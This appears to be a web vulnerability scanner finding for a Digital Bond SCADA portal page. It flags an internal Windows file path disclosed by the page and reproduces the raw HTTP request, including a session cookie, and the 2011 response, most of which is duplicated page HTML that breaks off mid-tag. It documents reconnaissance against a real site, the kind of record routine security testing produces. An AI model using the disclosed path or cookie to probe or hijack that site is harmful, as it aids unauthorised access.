target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=8" title="Industrial Defender"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/BWS6XY_banner_2011.02.22b.gif" alt="Industrial Defender" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="http://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Left Sidebar -->
<td id="left">
<div id="text-3" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Bandolier Security Audit File" href="http://digitalbond.com/2011/02/14/bandolier-security-audit-file-for-sisco-iccp-server/">Bandolier Security Audit Files for SISCO ICCP Server</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/2011.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/2011.jpg" alt="" width="57" height="56" /></a></p><p><a title="ICSJWG" href="http://www.us-cert.gov/control_systems/icsjwg/conference.html">Dale Peterson presenting on USG Funded ICS Security Tools @ ICSJWG</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p></div> </div><div id="flexipages-3" class="widget flexipages_widget"><div class="widget-title"><h3>Pages</h3></div><ul> <li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" title="Consulting">Consulting</a></li> <li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" title="Critical Intelligence">Critical Intelligence</a></li> <li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" title="SCADApedia">SCADApedia</a></li> <li class="page_item page-item-5501 current_page_ancestor"><a href="http://www.digitalbond.com/tools/" title="Tools">Tools</a> <ul> <li class="page_item page-item-5502"><a href="http://www.digitalbond.com/tools/bandolier/" title="Bandolier">Bandolier</a></li> <li class="page_item page-item-5503 current_page_ancestor current_page_parent"><a href="http://www.digitalbond.com/tools/portaledge/" title="Portaledge">Portaledge</a> <ul> <li class="page_item page-item-9450"><a href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/" title="NERC CIP-5 Monitoring Modules">NERC CIP-5 Monitoring Modules</a></li> <li class="page_item page-item-8863"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-and-nerc-cip/" title="Portaledge and NERC CIP">Portaledge and NERC CIP</a></li> <li class="page_item page-item-9483"><a href="http://www.digitalbond.com/tools/portaledge/availability-event-class/" title="Availability Event Class">Availability Event Class</a></li> <li class="page_item page-item-8868"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-enumeration-event-class/" title="Enumeration Event Class">Enumeration Event Class</a></li> <li class="page_item page-item-8875 current_page_item"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-event-installation/" title="Portaledge Event Installation">Portaledge Event Installation</a></li> <li class="page_item page-item-8876"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-event-taxonomy/" title="Portaledge Event Taxonomy">Portaledge Event Taxonomy</a></li> <li class="page_item page-item-8880"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-sem-integration/" title="Portaledge SEM Integration">Portaledge SEM Integration</a></li> </ul></li> <li class="page_item page-item-5504"><a href="http://www.digitalbond.com/tools/quickdraw/" title="Quickdraw SCADA IDS">Quickdraw SCADA IDS</a></li> <li class="page_item page-item-5505"><a href="http://www.digitalbond.com/tools/the-rack/" title="The Rack">The Rack</a></li> <li class="page_item page-item-8994"><a href="http://www.digitalbond.com/tools/scada-honeynet/" title="SCADA Honeynet">SCADA Honeynet</a></li> <li class="page_item page-item-9353"><a href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/" title="ICS Security Tool Mail List">ICS Security Tool Mail List</a></li> </ul></li> <li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" title="About Us">About Us</a></li> <li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" title="Advertise">Advertise</a></li></ul>..
|
- /tools/portaledge/portaledge-sem-integration/
/tools/portaledge/portaledge-sem-integration/ |
Identified Internal Path(s)
C:\Program Files\PIPC\ACE\SEM.txt
Request
GET /tools/portaledge/portaledge-sem-integration/ HTTP/1.1
Referer: http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:00:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Tue, 19 Apr 2011 22:00:18 GMT
Cache-Control: max-age=7200, public, must-revalidate, proxy-revalidate
Pragma: public
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Link: <http://wp.me/P1lryr-2je>; rel=shortlink
Last-Modified: Tue, 19 Apr 2011 20:00:18 GMT
Vary: Accept-Encoding,Cookie,User-Agent
Etag: ceea6649f19b00fbe522eeac028b1b77
Content-Encoding:
X-Type: default
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Portaledge SEM Integration | Digital Bond's SCADA Security Portal</title>
<link rel="shortcut icon" href="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="http://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="http://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="http://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='blackbirdpie-css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/css/blackbirdpie.css?ver=20110404' type='text/css' media='all' /><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/comment-reply.js?ver=20090102'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/js/blackbirdpie.js?ver=20110404'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='http://www.digitalbond.com/' /><link rel='up' title='Portaledge' href='http://www.digitalbond.com/tools/portaledge/' /><link rel='prev' title='Network Device Performance Degradation Event' href='http://www.digitalbond.com/tools/portaledge/availability-event-class/network-device-performance-degradation-event/' /><link rel='next' title='Simple Network Availability Event' href='http://www.digitalbond.com/tools/portaledge/availability-event-class/simple-network-availability-event/' /><link rel='shortlink' href='http://wp.me/P1lryr-2je' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,417] --><link rel="canonical" href="http://www.digitalbond.com/tools/portaledge/portaledge-sem-integration/" /><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('http://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="http://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="page page-id-8880 page-child parent-pageid-5503">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="colone" /><col class="coltwo" />
</colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="http://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501 current_page_ancestor"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="http://www.digitalbond.com/"><img class="logo" src="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="http://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Left Sidebar -->
<td id="left">
<div id="text-3" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Bandolier Security Audit File" href="http://digitalbond.com/2011/02/14/bandolier-security-audit-file-for-sisco-iccp-server/">Bandolier Security Audit Files for SISCO ICCP Server</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/2011.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/2011.jpg" alt="" width="57" height="56" /></a></p><p><a title="ICSJWG" href="http://www.us-cert.gov/control_systems/icsjwg/conference.html">Dale Peterson presenting on USG Funded ICS Security Tools @ ICSJWG</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p></div> </div><div id="flexipages-3" class="widget flexipages_widget"><div class="widget-title"><h3>Pages</h3></div><ul> <li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" title="Consulting">Consulting</a></li> <li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" title="Critical Intelligence">Critical Intelligence</a></li> <li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" title="SCADApedia">SCADApedia</a></li> <li class="page_item page-item-5501 current_page_ancestor"><a href="http://www.digitalbond.com/tools/" title="Tools">Tools</a> <ul> <li class="page_item page-item-5502"><a href="http://www.digitalbond.com/tools/bandolier/" title="Bandolier">Bandolier</a></li> <li class="page_item page-item-5503 current_page_ancestor current_page_parent"><a href="http://www.digitalbond.com/tools/portaledge/" title="Portaledge">Portaledge</a> <ul> <li class="page_item page-item-9450"><a href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/" title="NERC CIP-5 Monitoring Modules">NERC CIP-5 Monitoring Modules</a></li> <li class="page_item page-item-8863"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-and-nerc-cip/" title="Portaledge and NERC CIP">Portaledge and NERC CIP</a></li> <li class="page_item page-item-9483"><a href="http://www.digitalbond.com/tools/portaledge/availability-event-class/" title="Availability Event Class">Availability Event Class</a></li> <li class="page_item page-item-8868"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-enumeration-event-class/" title="Enumeration Event Class">Enumeration Event Class</a></li> <li class="page_item page-item-8875"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-event-installation/" title="Portaledge Event Installation">Portaledge Event Installation</a></li> <li class="page_item page-item-8876"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-event-taxonomy/" title="Portaledge Event Taxonomy">Portaledge Event Taxonomy</a></li> <li class="page_item page-item-8880 current_page_item"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-sem-integration/" title="Portaledge SEM Integration">Portaledge SEM Integration</a></li> </ul></li> <li class="page_item page-item-5504"><a href="http://www.digitalbond.com/tools/quickdraw/" title="Quickdraw SCADA IDS">Quickdraw SCADA IDS</a></li> <li class="page_item page-item-5505"><a href="http://www.digitalbond.com/tools/the-rack/" title="The Rack">The Rack</a></li> <li class="page_item page-item-8994"><a href="http://www.digitalbond.com/tools/scada-honeynet/" title="SCADA Honeynet">SCADA Honeynet</a></li> <li class="page_item page-item-9353"><a href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/" title="ICS Security Tool Mail List">ICS Security Tool Mail List</a></li> </ul></li> <li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" title="About Us">About Us</a></li> <li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" title="Advertise">Advertise</a></li></ul></div>
</td>
<!-- / Left Sidebar -->
<!-- Main Column -->
<td id="middle">
<div class="post-8880 page type-page status-publish hen..
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:00:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Tue, 19 Apr 2011 22:00:18 GMT
Cache-Control: max-age=7200, public, must-revalidate, proxy-revalidate
Pragma: public
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Link: <http://wp.me/P1lryr-2je>; rel=shortlink
Last-Modified: Tue, 19 Apr 2011 20:00:18 GMT
Vary: Accept-Encoding,Cookie,User-Agent
Etag: ceea6649f19b00fbe522eeac028b1b77
Content-Encoding:
X-Type: default
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Portaledge SEM Integration | Digital Bond's SCADA Security Portal</title>
<link rel="shortcut icon" href="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="http://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="http://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="http://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='blackbirdpie-css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/css/blackbirdpie.css?ver=20110404' type='text/css' media='all' /><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/comment-reply.js?ver=20090102'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/js/blackbirdpie.js?ver=20110404'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='http://www.digitalbond.com/' /><link rel='up' title='Portaledge' href='http://www.digitalbond.com/tools/portaledge/' /><link rel='prev' title='Network Device Performance Degradation Event' href='http://www.digitalbond.com/tools/portaledge/availability-event-class/network-device-performance-degradation-event/' /><link rel='next' title='Simple Network Availability Event' href='http://www.digitalbond.com/tools/portaledge/availability-event-class/simple-network-availability-event/' /><link rel='shortlink' href='http://wp.me/P1lryr-2je' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,417] --><link rel="canonical" href="http://www.digitalbond.com/tools/portaledge/portaledge-sem-integration/" /><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('http://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="http://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="page page-id-8880 page-child parent-pageid-5503">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="colone" /><col class="coltwo" />
</colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="http://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501 current_page_ancestor"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="http://www.digitalbond.com/"><img class="logo" src="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a 